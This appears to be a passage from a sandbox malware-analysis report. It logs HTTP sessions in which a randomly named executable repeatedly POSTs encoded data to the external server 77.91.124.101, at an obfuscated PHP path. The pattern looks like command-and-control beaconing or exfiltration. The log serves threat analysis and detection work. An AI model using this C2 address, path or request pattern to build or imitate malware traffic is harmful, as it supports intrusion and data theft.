                                                            Nov 21, 2023 04:47:28.852116108 CET158OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:29.050067902 CET159INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:29.050301075 CET161OUTData Raw: 57 5b 5d 5a 5e 5d 5a 5d 5d 57 55 57 55 59 57 55 50 5f 58 44 56 57 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W[]Z^]Z]]WUWUYWUP_XDVWW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'+8)Y?*348% 6)#.S$."V&#%:;(/_8>&G''^)
                                                            Nov 21, 2023 04:47:29.257055044 CET162INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:28 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4077.91.124.10180192.168.2.549754C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:54.317177057 CET330OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:54.517254114 CET330INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:54.517621040 CET332OUTData Raw: 57 5f 5d 5b 5e 59 5a 59 5d 57 55 57 55 56 57 54 50 5d 58 43 56 5e 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_][^YZY]WUWUVWTP]XCV^WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$);"<.=U'.4[ +0)'.'3=.]!?</>&G''^)
                                                            Nov 21, 2023 04:47:54.721622944 CET333INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:54 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            40192.168.2.54975477.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:54.317177057 CET330OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:54.517254114 CET330INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:54.517621040 CET332OUTData Raw: 57 5f 5d 5b 5e 59 5a 59 5d 57 55 57 55 56 57 54 50 5d 58 43 56 5e 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_][^YZY]WUWUVWTP]XCV^WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$);"<.=U'.4[ +0)'.'3=.]!?</>&G''^)
                                                            Nov 21, 2023 04:47:54.721622944 CET333INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:54 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4177.91.124.10180192.168.2.549755C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:54.726335049 CET334OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1396
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:54.924632072 CET334INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:54.924892902 CET336OUTData Raw: 52 5c 58 5b 5e 59 5a 5f 5d 57 55 57 55 5e 57 5b 50 59 58 45 56 5f 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\X[^YZ_]WUWU^W[PYXEV_W^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*%X?>*3/4- 5_) *$["'W9)(7],.&G''^)
                                                            Nov 21, 2023 04:47:55.129759073 CET339INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:54 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 05 27 2c 23 00 20 23 2b 1e 28 3a 07 14 3a 58 2e 44 28 55 35 5f 32 04 34 13 27 17 25 1b 3f 59 2f 05 27 00 2c 56 20 25 33 04 3d 1a 21 5a 0c 1d 25 04 36 5e 27 55 2b 07 23 02 2b 2d 0e 5e 26 22 3f 15 3c 3e 27 16 23 0a 3b 5d 31 30 3c 57 3b 06 31 59 3a 01 3d 18 25 5a 2a 1d 22 3d 23 5f 0c 14 24 08 21 31 02 07 23 33 25 09 21 09 34 15 23 24 2c 0d 24 2d 24 56 25 2b 21 5e 2a 28 0e 56 31 51 20 50 26 29 2c 0a 26 00 23 51 28 3a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !',# #+(::X.D(U5_24'%?Y/',V %3=!Z%6^'U+#+-^&"?<>'#;]10<W;1Y:=%Z*"=#_$!1#3%!4#$,$-$V%+!^*(V1Q P&),&#Q(:&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            41192.168.2.54975577.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:54.726335049 CET334OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1396
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:54.924632072 CET334INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:54.924892902 CET336OUTData Raw: 52 5c 58 5b 5e 59 5a 5f 5d 57 55 57 55 5e 57 5b 50 59 58 45 56 5f 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\X[^YZ_]WUWU^W[PYXEV_W^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*%X?>*3/4- 5_) *$["'W9)(7],.&G''^)
                                                            Nov 21, 2023 04:47:55.129759073 CET339INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:54 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 05 27 2c 23 00 20 23 2b 1e 28 3a 07 14 3a 58 2e 44 28 55 35 5f 32 04 34 13 27 17 25 1b 3f 59 2f 05 27 00 2c 56 20 25 33 04 3d 1a 21 5a 0c 1d 25 04 36 5e 27 55 2b 07 23 02 2b 2d 0e 5e 26 22 3f 15 3c 3e 27 16 23 0a 3b 5d 31 30 3c 57 3b 06 31 59 3a 01 3d 18 25 5a 2a 1d 22 3d 23 5f 0c 14 24 08 21 31 02 07 23 33 25 09 21 09 34 15 23 24 2c 0d 24 2d 24 56 25 2b 21 5e 2a 28 0e 56 31 51 20 50 26 29 2c 0a 26 00 23 51 28 3a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !',# #+(::X.D(U5_24'%?Y/',V %3=!Z%6^'U+#+-^&"?<>'#;]10<W;1Y:=%Z*"=#_$!1#3%!4#$,$-$V%+!^*(V1Q P&),&#Q(:&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            42192.168.2.54975677.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:54.853936911 CET334OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:55.051373005 CET336INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:55.051578045 CET339OUTData Raw: 52 5f 58 59 5e 5f 5a 5a 5d 57 55 57 55 59 57 5b 50 52 58 45 56 5e 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_XY^_ZZ]WUWUYW[PRXEV^WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'>)_?)U?^/B&_ (3:V0[:Q30R9&](?<8&G''^)
                                                            Nov 21, 2023 04:47:55.259167910 CET339INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:54 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4277.91.124.10180192.168.2.549756C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:54.853936911 CET334OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:55.051373005 CET336INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:55.051578045 CET339OUTData Raw: 52 5f 58 59 5e 5f 5a 5a 5d 57 55 57 55 59 57 5b 50 52 58 45 56 5e 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_XY^_ZZ]WUWUYW[PRXEV^WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'>)_?)U?^/B&_ (3:V0[:Q30R9&](?<8&G''^)
                                                            Nov 21, 2023 04:47:55.259167910 CET339INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:54 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            43192.168.2.54975777.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:55.583935976 CET340OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:55.782804012 CET341INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:55.789611101 CET343OUTData Raw: 57 5e 58 51 5b 5f 5a 51 5d 57 55 57 55 5d 57 51 50 59 58 48 56 51 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W^XQ[_ZQ]WUWU]WQPYXHVQW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+8%(>R*#_8'9#:X+0&0=0=-++?#]->&G''^)+
                                                            Nov 21, 2023 04:47:55.996412992 CET343INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:55 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4377.91.124.10180192.168.2.549757C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:55.583935976 CET340OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:55.782804012 CET341INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:55.789611101 CET343OUTData Raw: 57 5e 58 51 5b 5f 5a 51 5d 57 55 57 55 5d 57 51 50 59 58 48 56 51 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W^XQ[_ZQ]WUWU]WQPYXHVQW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+8%(>R*#_8'9#:X+0&0=0=-++?#]->&G''^)+
                                                            Nov 21, 2023 04:47:55.996412992 CET343INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:55 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4477.91.124.10180192.168.2.549758C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:56.347644091 CET344OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:56.545571089 CET344INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:56.545799017 CET347OUTData Raw: 57 58 58 5c 5b 5e 5a 5b 5d 57 55 57 55 5c 57 57 50 52 58 42 56 5f 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WXX\[^Z[]WUWU\WWPRXBV_W^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=^"?+1>#.7-#9:(=$=$#%.><</>&G''^)/
                                                            Nov 21, 2023 04:47:56.750597000 CET347INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:56 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            44192.168.2.54975877.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:56.347644091 CET344OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:56.545571089 CET344INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:56.545799017 CET347OUTData Raw: 57 58 58 5c 5b 5e 5a 5b 5d 57 55 57 55 5c 57 57 50 52 58 42 56 5f 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WXX\[^Z[]WUWU\WWPRXBV_W^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=^"?+1>#.7-#9:(=$=$#%.><</>&G''^)/
                                                            Nov 21, 2023 04:47:56.750597000 CET347INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:56 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            45192.168.2.54975977.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:57.069133997 CET348OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:57.268942118 CET348INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:57.269268036 CET351OUTData Raw: 57 59 58 5d 5e 59 5a 5d 5d 57 55 57 55 5f 57 57 50 53 58 46 56 50 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WYX]^YZ]]WUWU_WWPSXFVPWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X*8=+"=Z/27)9+U)3.&0&,+9<,+Y,&G''^)#
                                                            Nov 21, 2023 04:47:57.475258112 CET351INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:57 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4577.91.124.10180192.168.2.549759C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:57.069133997 CET348OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:57.268942118 CET348INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:57.269268036 CET351OUTData Raw: 57 59 58 5d 5e 59 5a 5d 5d 57 55 57 55 5f 57 57 50 53 58 46 56 50 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
